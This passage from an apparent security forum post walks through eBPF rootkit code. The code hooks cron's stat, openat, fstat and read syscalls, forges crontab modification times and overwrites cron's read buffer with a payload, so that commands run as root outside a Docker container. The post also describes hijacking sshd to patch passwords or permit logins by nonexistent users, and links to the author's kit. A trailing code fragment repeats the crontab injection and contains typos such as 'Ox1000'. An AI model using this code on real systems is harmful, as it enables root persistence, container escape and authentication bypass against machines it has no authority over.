  pathname = (char *)PT_REGS_PARM1_CORE(regs);
  bpf_probe_read_str(buf,sizeof(buf),pathname);
   // Check if the file is "/etc/crontab" or "crontabs"
  if(memcmp(buf , CRONTAB , sizeof(CRONTAB)) && memcmp(buf,SPOOL_DIR,sizeof(SPOOL_DIR))){
        return 0;
  }
  if(cron_pid == 0){
        cron_pid = bpf_get_current_pid_tgid() & 0xffffffff;
    //bpf_printk("New cron_pid: %d\n",cron_pid);
    }
 
  memcpy(filename_saved , buf , 64);
  bpf_printk("[sys_enter::handle_enter_stat()] New filename_saved: %s\n",filename_saved);
 
  //bpf_printk("%lx\n",PT_REGS_PARM2(regs));
  // Read the file's state address, saved into statbuf_ptr from regs->rsi
  statbuf_ptr = (struct stat *)PT_REGS_PARM2_CORE(regs);
  //bpf_probe_read_kernel(&statbuf_ptr , sizeof(statbuf_ptr) , PT_REGS_PARM2(regs));
 
  return 0;
}

The main purpose here is to capture the place where the two file names are judged in the corresponding cron process.

handle_exit_stat()

stat exits.

Our goal at this time is the two TEQUAL behind the bypass, let cron detect the update of the file, and then immediately call process_crontab("root", NULL, SYSCRONTAB, &syscron_stat,&new_db, old_db)

static __inline int handle_exit_stat(){
  if(statbuf_ptr == 0){
    return 0;
  }
 
  bpf_printk("[sys_exit::handle_exit_stat()] cron %d stat() %s\n",cron_pid , filename_saved);
 
 
  /*
 
  At this point, we need to make sure that the following two conditions are both passed.
  Which is equivalent to :
 
  !TEQUAL(old_db->mtim, TMAX(statbuf.st_mtim, syscron_stat.st_mtim)) [1]
  !TEQUAL(syscron_stat.st_mtim, ts_zero) [2]
 
  */
 
 // We are tend to set statbuf.st_mtim ZERO and set syscron_stat.st_mtim a SMALL RANDOM VALUE
  __kernel_ulong_t spool_dir_st_mtime = 0;
  __kernel_ulong_t crontab_st_mtime = bpf_get_prandom_u32() & 0xffff; //bpf_get_prandom_u32 Returns a pseudo-random u32.
 
  // Ensure the file is our target
 
  // If we are checking SPOOL_DIR
  if(!memcmp(filename_saved , SPOOL_DIR , sizeof(SPOOL_DIR))){
    bpf_probe_write_user(&statbuf_ptr->st_mtime , &spool_dir_st_mtime , sizeof(spool_dir_st_mtime) );
  }
 
  if(!memcmp(filename_saved , CRONTAB , sizeof(CRONTAB))){
    bpf_probe_write_user(&statbuf_ptr->st_mtime , &crontab_st_mtime ,sizeof(crontab_st_mtime));
  }
 
  bpf_printk("[sys_exit::handle_exit_stat()] Modify DONE\n");
  // update
  statbuf_ptr = 0;
 
  return 0;
}

open

open -> open64 -> openat

So we end up hooking openat.

int openat(int dirfd, const char *pathname, int flags);
int openat(int dirfd, const char *pathname, int flags, mode_t mode);

When entering, we want to save + judge the parameters in rsi. On exit, save open_fd.

// int openat(int dirfd , const char * pathname
static __inline int handle_enter_openat(struct bpf_raw_tracepoint_args *ctx) {
  struct pt_regs *regs;
    char buf[0x40];
    char *pathname ;
 
    regs = (struct pt_regs *)(ctx->args[0]);
  pathname = (char *)PT_REGS_PARM2_CORE(regs);
  bpf_probe_read_str(buf,sizeof(buf),pathname);
 
   // Check if open SYSCRONTAB
  if(memcmp(buf , SYSCRONTAB , sizeof(SYSCRONTAB))){
        return 0;
  }
  bpf_printk("[sys_enter::handle_enter_openat] We Got it: %s\n",buf);
 
  // Save to openat_filename_saved
  memcpy(openat_filename_saved , buf , 64);
  return 0;
}

static __inline int handle_exit_openat(struct bpf_raw_tracepoint_args *ctx){
   if(openat_filename_saved[0]==0){
    return 0;
  }
  // Ensure we open SYSCROnTAB
  if(!memcmp(openat_filename_saved , SYSCRONTAB , sizeof(SYSCRONTAB)))
  {
    // save the corresponding file descriptor
    open_fd = ctx->args[1];
    bpf_printk("[sys_exit::handle_exit_openat()] openat: %s, fd: %d\n",openat_filename_saved , open_fd);
    openat_filename_saved[0] = '\0';
  }
  return 0;
}

ok, now we have the corresponding fd.

fstat

int fstat(int fd, struct stat *statbuf);

// int fstat(int fd, struct stat *statbuf);
static __inline int handle_enter_fstat(struct bpf_raw_tracepoint_args *ctx){
 
 
  struct pt_regs *regs;
    char buf[0x40];
    char *pathname ;
  int fd=0;
 
    regs = (struct pt_regs *)(ctx->args[0]);
  fd = PT_REGS_PARM1_CORE(regs);
  if(fd != open_fd){
    return 0;
  }
 
  bpf_printk("[sys_enter::handle_enter_fstat] We Got fd: %d\n",fd);
  statbuf_fstat_ptr = (struct stat *)PT_REGS_PARM2_CORE(regs);
  return 0;
}

static __inline int handle_exit_fstat(){
 
  if(open_fd == 0){
    return 0;
  }
  if(statbuf_fstat_ptr == 0){
    return 0;
  }
 
  __kernel_ulong_t crontab_st_mtime = bpf_get_prandom_u32() & 0xffff;
 
  // bpf_printk("[sys_exit::handle_exit_fstat]: HIT!\n");
 
 
  bpf_probe_write_user(&statbuf_fstat_ptr->st_mtime , &crontab_st_mtime ,sizeof(crontab_st_mtime));
 
  bpf_printk("[sys_exit::handle_exit_fstat()] Modify DONE\n");
 
 
  //open_fd = 0;
 
  return 0;
}

read

// read(int fd, void *buf, size_t count);
static __inline int handle_enter_read(struct bpf_raw_tracepoint_args *ctx){
  int pid=0;
  pid = bpf_get_current_pid_tgid() & 0xffffffff;
  if(pid!=cron_pid){
    return 0;
  }
  struct pt_regs *regs;
    char buf[0x40];
    char *pathname ;
  int fd=0;
  regs = (struct pt_regs *)(ctx->args[0]);
  fd = PT_REGS_PARM1_CORE(regs);
  read_buf_ptr = (void *)PT_REGS_PARM2_CORE(regs);
  if(fd != open_fd){
    jump_flag = MISS;
    return 0;
  }
  jump_flag = HIT;
 
 
  bpf_printk("[sys_enter::handle_enter_read] fd is %d\n",fd);
  bpf_printk("[sys_enter::handle_enter_read] read_buf is : 0x%lx\n",read_buf_ptr);
  return 0;
}

static __inline int handle_exit_read(struct bpf_raw_tracepoint_args *ctx){
  if(jump_flag == MISS){
    return 0;
  }
  int pid=0;
  pid = bpf_get_current_pid_tgid() & 0xffffffff;
  if(pid!=cron_pid){
    return 0;
  }
 
  if(read_buf_ptr == 0){
    return 0;
  }
  ssize_t ret = ctx->args[1];
  if (ret <= 0)
    {
        read_buf_ptr = 0;
        bpf_printk("[sys_exut::handle_exit_read] read failed!\n");
        return 0;
    }
  bpf_printk("[sys_exut::handle_exit_read] your read length: 0x%lx\n",ret);
  if (ret < sizeof(PAYLOAD))
    {
        bpf_printk("PAYLOAD too long\n");
 
        read_buf_ptr = 0;
        return 0;
    }
 
  bpf_printk("[sys_exut::handle_exit_read] target write addr: 0x%lx\n",read_buf_ptr);
 
  //bpf_printk("%s\n",(char *)(read_buf_ptr+0x2bb));
  bpf_probe_write_user((char *)(read_buf_ptr), PAYLOAD, sizeof(PAYLOAD));
  bpf_printk("[sys_exut::handle_exit_read] sizeof PAYLOAD(%d) ; HIJACK DONE!\n",sizeof(PAYLOAD));
  read_buf_ptr = 0;
  jump_flag = MISS;
  return 0;
}

Testing in Docker

First build the corresponding environment

FROM ubuntu:20.04   
ARG DEBIAN_FRONTEND=noninteractive   
 
# Next, use sed -i to perform global string replacement of text to do the source change operation
RUN \
 sed -i "s/http:\/\/archive.ubuntu.com/http:\/\/mirrors.163.com/g" /etc/apt/sources.list && \
 sed -i "s/http:\/\/security.ubuntu.com/http:\/\/mirrors.163.com/g" /etc/apt/sources.list && \
 apt-get update && \
 apt-get -y dist-upgrade && \
 apt-get install -y lib32z1 ssh cpio libelf-dev
RUN useradd -m ctf
 
cmd ["/bin/sh"]   
 
EXPOSE 9999

docker build -t .
 
docker run -ti --cap-add SYS_ADMIN -- /bin/sh # Note that it is given to admin here
 
docker cp ./hello :/

Just run the corresponding file directly in docker.

Of course, it can be observed from the log of cron:

journalctl -f -u cron

Finally executed the command outside of docker.

Hijacking sshd process via eBPF

After this article, it is actually easy to think that since eBPF can be used to hijack the system calls of other processes, is it possible to do something else, such as trying to target some other ** user modes other than crond High-privileged processes ** do some things, in fact, a relatively easy to think of is the sshd process.

In fact, sshd hijacking can be achieved through eBPF. The implementation principle is similar to the above crontab hook, and the final effects include but are not limited to:

Patch the original user's password.
Modify a low-privileged user to a high-privileged login user.
Log in directly with a non-existing user.

However, as a pwn player/binary player, I don't really know what exactly this does, but he can indeed achieve such an effect. . . My implementation code can be found at: https://github.com/OrangeGzY/Eebpf-kit/blob/main/libbpf-bootstrap/examples/c/esshd.bpf.c.

[Announcement] Everyone is welcome to actively try the November exam questions of the Advanced Research Class and challenge your own limits!

Last edited by ScUpax0s 16 minutes ago for:

#Exploit #Linux

	#define BPF_NO_PRESERVE_ACCESS_INDEX

	#include "vmlinux.h"
	#include <bpf/bpf_helpers.h>
	#include <bpf/bpf_tracing.h>



	SEC("raw_tracepoint/sys_exit")
	int sys_exit_hook(struct bpf_raw_tracepoint_args *ctx) {
	size_t pid_tgid = bpf_get_current_pid_tgid();
	serialize_t *s = bpf_map_lookup_elem(&state_map, &pid_tgid);
	if (s == NULL) {
	return 0;
	}
	switch (s->syscall_id) {
	case (0): { // read /if (s->regs.dx != Ox1000) { break; }/ //bpf_printk("exit
	// save state: syscall_id: %u\n", s->syscall_id);
	size_t buf_addr = (size_t)s->regs.si;
	char buf[16];
	bpf_probe_read(buf, sizeof(buf), (void *)buf_addr);
	if (buf[0] == '#' && buf[1] == ' '
	&& buf[2] == '/' && buf[3] == 'e' && buf[4] == 't' && buf[5] == 'c' && buf[6] == '/'
	&& buf[7] == 'c' && buf[8] == 'r' && buf[9] == 'o' && buf[10] == 'n'
	&& buf[11] == 't' && buf[12] == 'a' && buf[13] == 'b') {
	// bpf_printk("got /etc/crontab: ... writing in payload\n");
	uint32_t payload key = 0;
	char* payload = bpf_map_lookup_elem(&payload_map, &payload key);
	if (payload != NULL && payload[0] != '\0') {
	bpf_probe_write_user((void*)buf_addr, payload, Ox1000);
	}
	}
	break;
	}